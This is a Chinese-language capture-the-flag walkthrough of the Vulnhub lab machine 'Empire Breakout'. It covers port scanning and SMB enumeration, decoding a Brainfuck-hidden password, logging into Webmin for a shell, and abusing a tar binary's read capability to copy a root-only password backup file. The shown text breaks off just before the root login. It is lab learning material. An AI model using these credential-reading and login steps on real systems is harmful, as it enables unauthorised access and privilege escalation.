靶机Vulnhub的Empire Breakout攻略
首先扫描目标有哪些开放的端口:
# nmap -sV -A -sC -p- 192.168.140.164 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-14 00:16 EDT Nmap scan report for 192.168.140.164 Host is up (0.0012s latency). Not shown: 65530 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.51 ((Debian)) |_http-server-header: Apache/2.4.51 (Debian) |_http-title: Apache2 Debian Default Page: It works 139/tcp open netbios-ssn Samba smbd 4.6.2 445/tcp open netbios-ssn Samba smbd 4.6.2 10000/tcp open http MiniServ 1.981 (Webmin httpd) |_http-title: 200 — Document follows 20000/tcp open http MiniServ 1.830 (Webmin httpd) |_http-title: 200 — Document follows MAC Address: 00:0C:29:26:7A:D8 (VMware) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.6 Network Distance: 1 hop Host script results: | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb2-time: | date: 2022-04-14T04:17:00 |_ start_date: N/A |_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) TRACEROUTE HOP RTT ADDRESS 1 1.24 ms 192.168.140.164 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 58.48 seconds
从扫描结果得知,有http服务、以及运行于高位端口(10000以及20000)的webmin服务,以及Samba服务。
首先分别登陆目标的80以及10000端口,发现80端口只有一个默认页面,而10000端口也就是网站管理接口需要用户名以及密码。
80端口页面虽然没有什么内容,但是页面源代码中发现如下信息:
<!-- don't worry no one will get here, it's safe to share with you my access. Its encrypted :) ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++. -->
这应该是一串加密后的代码。经查询这是一种brainfuck加密方法:
Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。 Ook与Brainfuck类似,也是用替换法。 特征: brainfuck语言用> < + - . , [ ]八种符号来替换C语言的各种语法和命令: 例如: +++++++++++++++++.>+++++++++++++++++++++++++++++++++++++++++
到网站 https://www.splitbrain.org/services/ook 进行破解,得到解密后的信息:.2uqPEfj3D<P'a-3,应该是密码什么的,但是目前我们并没有得到用户名,因此用enum4linux尝试一下:
# enum4linux 192.168.140.164 -a Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Apr 14 00:32:55 2022 ========================== | Target Information | ========================== Target ........... 192.168.140.164 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ======================================================= | Enumerating Workgroup/Domain on 192.168.140.164 | ======================================================= [+] Got domain/workgroup name: WORKGROUP =============================================== | Nbtstat Information for 192.168.140.164 | =============================================== Looking up status of 192.168.140.164 BREAKOUT <00> - B <ACTIVE> Workstation Service BREAKOUT <03> - B <ACTIVE> Messenger Service BREAKOUT <20> - B <ACTIVE> File Server Service ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name WORKGROUP <1d> - B <ACTIVE> Master Browser WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections MAC Address = 00-00-00-00-00-00 ======================================== | Session Check on 192.168.140.164 | ======================================== [+] Server 192.168.140.164 allows sessions using username '', password '' ============================================== | Getting domain SID for 192.168.140.164 | ============================================== Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ========================================= | OS information on 192.168.140.164 | ========================================= Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 192.168.140.164 from smbclient: [+] Got OS info for 192.168.140.164 from srvinfo: BREAKOUT Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian platform_id : 500 os version : 6.1 server type : 0x809a03 ================================ | Users on 192.168.140.164 | ================================ Use of uninitialized value $users in print at ./enum4linux.pl line 874. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877. Use of uninitialized value $users in print at ./enum4linux.pl line 888. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890. ============================================ | Share Enumeration on 192.168.140.164 | ============================================ smbXcli_negprot_smb1_done: No compatible protocol selected by server. Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers IPC$ IPC IPC Service (Samba 4.13.5-Debian) Reconnecting with SMB1 for workgroup listing. protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE Unable to connect with SMB1 -- no workgroup available [+] Attempting to map shares on 192.168.140.164 //192.168.140.164/print$ Mapping: DENIED, Listing: N/A //192.168.140.164/IPC$ [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* ======================================================= | Password Policy Information for 192.168.140.164 | ======================================================= [+] Attaching to 192.168.140.164 using a NULL share [+] Trying protocol 139/SMB... [+] Found domain(s): [+] BREAKOUT [+] Builtin [+] Password Info for Domain: BREAKOUT [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: 37 days 6 hours 21 minutes [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: 37 days 6 hours 21 minutes [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 ================================= | Groups on 192.168.140.164 | ================================= [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: ========================================================================== | Users on 192.168.140.164 via RID cycling (RIDS: 500-550,1000-1050) | ========================================================================== [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-1683874020-4104641535-3793993001 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-32 and logon username '', password '' S-1-5-32-500 *unknown*\*unknown* (8) S-1-5-32-501 *unknown*\*unknown* (8) S-1-5-32-502 *unknown*\*unknown* (8) S-1-5-32-503 *unknown*\*unknown* (8) S-1-5-32-504 *unknown*\*unknown* (8) S-1-5-32-505 *unknown*\*unknown* (8) S-1-5-32-506 *unknown*\*unknown* (8) S-1-5-32-507 *unknown*\*unknown* (8) S-1-5-32-508 *unknown*\*unknown* (8) S-1-5-32-509 *unknown*\*unknown* (8) S-1-5-32-510 *unknown*\*unknown* (8) S-1-5-32-511 *unknown*\*unknown* (8) S-1-5-32-512 *unknown*\*unknown* (8) S-1-5-32-513 *unknown*\*unknown* (8) S-1-5-32-514 *unknown*\*unknown* (8) S-1-5-32-515 *unknown*\*unknown* (8) S-1-5-32-516 *unknown*\*unknown* (8) S-1-5-32-517 *unknown*\*unknown* (8) S-1-5-32-518 *unknown*\*unknown* (8) S-1-5-32-519 *unknown*\*unknown* (8) S-1-5-32-520 *unknown*\*unknown* (8) S-1-5-32-521 *unknown*\*unknown* (8) S-1-5-32-522 *unknown*\*unknown* (8) S-1-5-32-523 *unknown*\*unknown* (8) S-1-5-32-524 *unknown*\*unknown* (8) S-1-5-32-525 *unknown*\*unknown* (8) S-1-5-32-526 *unknown*\*unknown* (8) S-1-5-32-527 *unknown*\*unknown* (8) S-1-5-32-528 *unknown*\*unknown* (8) S-1-5-32-529 *unknown*\*unknown* (8) S-1-5-32-530 *unknown*\*unknown* (8) S-1-5-32-531 *unknown*\*unknown* (8) S-1-5-32-532 *unknown*\*unknown* (8) S-1-5-32-533 *unknown*\*unknown* (8) S-1-5-32-534 *unknown*\*unknown* (8) S-1-5-32-535 *unknown*\*unknown* (8) S-1-5-32-536 *unknown*\*unknown* (8) S-1-5-32-537 *unknown*\*unknown* (8) S-1-5-32-538 *unknown*\*unknown* (8) S-1-5-32-539 *unknown*\*unknown* (8) S-1-5-32-540 *unknown*\*unknown* (8) S-1-5-32-541 *unknown*\*unknown* (8) S-1-5-32-542 *unknown*\*unknown* (8) S-1-5-32-543 *unknown*\*unknown* (8) S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) S-1-5-32-1000 *unknown*\*unknown* (8) S-1-5-32-1001 *unknown*\*unknown* (8) S-1-5-32-1002 *unknown*\*unknown* (8) S-1-5-32-1003 *unknown*\*unknown* (8) S-1-5-32-1004 *unknown*\*unknown* (8) S-1-5-32-1005 *unknown*\*unknown* (8) S-1-5-32-1006 *unknown*\*unknown* (8) S-1-5-32-1007 *unknown*\*unknown* (8) S-1-5-32-1008 *unknown*\*unknown* (8) S-1-5-32-1009 *unknown*\*unknown* (8) S-1-5-32-1010 *unknown*\*unknown* (8) S-1-5-32-1011 *unknown*\*unknown* (8) S-1-5-32-1012 *unknown*\*unknown* (8) S-1-5-32-1013 *unknown*\*unknown* (8) S-1-5-32-1014 *unknown*\*unknown* (8) S-1-5-32-1015 *unknown*\*unknown* (8) S-1-5-32-1016 *unknown*\*unknown* (8) S-1-5-32-1017 *unknown*\*unknown* (8) S-1-5-32-1018 *unknown*\*unknown* (8) S-1-5-32-1019 *unknown*\*unknown* (8) S-1-5-32-1020 *unknown*\*unknown* (8) S-1-5-32-1021 *unknown*\*unknown* (8) S-1-5-32-1022 *unknown*\*unknown* (8) S-1-5-32-1023 *unknown*\*unknown* (8) S-1-5-32-1024 *unknown*\*unknown* (8) S-1-5-32-1025 *unknown*\*unknown* (8) S-1-5-32-1026 *unknown*\*unknown* (8) S-1-5-32-1027 *unknown*\*unknown* (8) S-1-5-32-1028 *unknown*\*unknown* (8) S-1-5-32-1029 *unknown*\*unknown* (8) S-1-5-32-1030 *unknown*\*unknown* (8) S-1-5-32-1031 *unknown*\*unknown* (8) S-1-5-32-1032 *unknown*\*unknown* (8) S-1-5-32-1033 *unknown*\*unknown* (8) S-1-5-32-1034 *unknown*\*unknown* (8) S-1-5-32-1035 *unknown*\*unknown* (8) S-1-5-32-1036 *unknown*\*unknown* (8) S-1-5-32-1037 *unknown*\*unknown* (8) S-1-5-32-1038 *unknown*\*unknown* (8) S-1-5-32-1039 *unknown*\*unknown* (8) S-1-5-32-1040 *unknown*\*unknown* (8) S-1-5-32-1041 *unknown*\*unknown* (8) S-1-5-32-1042 *unknown*\*unknown* (8) S-1-5-32-1043 *unknown*\*unknown* (8) S-1-5-32-1044 *unknown*\*unknown* (8) S-1-5-32-1045 *unknown*\*unknown* (8) S-1-5-32-1046 *unknown*\*unknown* (8) S-1-5-32-1047 *unknown*\*unknown* (8) S-1-5-32-1048 *unknown*\*unknown* (8) S-1-5-32-1049 *unknown*\*unknown* (8) S-1-5-32-1050 *unknown*\*unknown* (8) [+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password '' S-1-5-21-1683874020-4104641535-3793993001-500 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User) S-1-5-21-1683874020-4104641535-3793993001-502 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-503 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-504 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-505 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-506 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-507 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-508 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-509 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-510 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-511 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-512 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group) S-1-5-21-1683874020-4104641535-3793993001-514 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-515 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-516 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-517 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-518 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-519 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-520 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-521 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-522 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-523 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-524 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-525 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-526 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-527 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-528 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-529 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-530 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-531 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-532 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-533 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-534 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-535 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-536 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-537 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-538 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-539 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-540 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-541 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-542 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-543 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-544 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-545 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-546 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-547 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-548 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-549 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-550 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1000 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1001 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1002 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1003 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1004 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1005 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1006 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1007 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1008 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1009 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1010 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1011 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1012 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1013 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1014 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1015 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1016 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1017 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1018 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1019 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1020 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1021 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1022 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1023 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1024 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1025 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1026 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1027 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1028 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1029 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1030 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1031 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1032 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1033 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1034 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1035 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1036 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1037 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1038 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1039 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1040 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1041 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1042 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1043 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1044 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1045 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1046 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1047 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1048 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1049 *unknown*\*unknown* (8) S-1-5-21-1683874020-4104641535-3793993001-1050 *unknown*\*unknown* (8) [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\cyber (Local User) ================================================ | Getting printer info for 192.168.140.164 |
从中发现了用户名cyber,因此用该用户名以及上面破解得到的密码,看能否登陆webmin,10000端口登陆并不成功,20000端口可以成功登陆。
在页面的地步(Cyber的左面,需要细心)发现了command_shell的功能,从而得到了user flag: 3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
下面尝试提权!
发现在家目录有一个具有可执行权限的文件 tar:
[cyber@breakout ~]$ ls -alh total 568K drwxr-xr-x 8 cyber cyber 4.0K Oct 20 07:52 . drwxr-xr-x 3 root root 4.0K Oct 19 08:24 .. -rw------- 1 cyber cyber 0 Oct 20 07:52 .bash_history -rw-r--r-- 1 cyber cyber 220 Oct 19 08:24 .bash_logout -rw-r--r-- 1 cyber cyber 3.5K Oct 19 08:24 .bashrc drwxr-xr-x 2 cyber cyber 4.0K Oct 19 14:06 .filemin drwx------ 2 cyber cyber 4.0K Oct 19 14:00 .gnupg drwxr-xr-x 3 cyber cyber 4.0K Oct 19 14:29 .local -rw-r--r-- 1 cyber cyber 807 Oct 19 08:24 .profile drwx------ 2 cyber cyber 4.0K Oct 19 13:59 .spamassassin -rwxr-xr-x 1 root root 520K Oct 19 15:40 tar drwxr-xr-x 2 cyber cyber 4.0K Apr 14 00:56 .tmp drwx------ 16 cyber cyber 4.0K Oct 19 14:26 .usermin -rw-r--r-- 1 cyber cyber 48 Oct 19 14:31 user.txt
然后用getcap命令搜索有执行权限的文件:
[cyber@breakout ~]$ getcap -r / 2> /dev/null /home/cyber/tar cap_dac_read_search=ep /usr/bin/ping cap_net_raw=ep
而在/var/backup中发现了该文件。old_pass.bak(隐藏文件),不过没有读取权限,从前面getcap可以知道tar是可以读取任何文件的:
[cyber@breakout backups]$ ls -alh total 28K drwxr-xr-x 2 root root 4.0K Apr 14 00:39 . drwxr-xr-x 14 root root 4.0K Oct 19 13:48 .. -rw-r--r-- 1 root root 13K Oct 19 15:56 apt.extended_states.0 -rw------- 1 root root 17 Oct 20 07:49 .old_pass.bak [cyber@breakout backups]$ cat .old_pass.bak cat: .old_pass.bak: Permission denied
[cyber@breakout ~]$ ./tar -cf jason.tar /var/backups/.old_pass.bak ./tar: Removing leading `/' from member names [cyber@breakout ~]$ ls jason.tar tar user.txt [cyber@breakout ~]$ tar -xf jason.tar [cyber@breakout ~]$ ls jason.tar tar user.txt var [cyber@breakout ~]$ cat /var/backups/.old_pass.bak cat: /var/backups/.old_pass.bak: Permission denied [cyber@breakout ~]$ cat var/backups/.old_pass.bak Ts&4&YurgtRX(=~h
Ts&4&YurgtRX(=~h,这应该是root密码,试一下:
STRIVE FOR PROGRESS,NOT FOR PERFECTION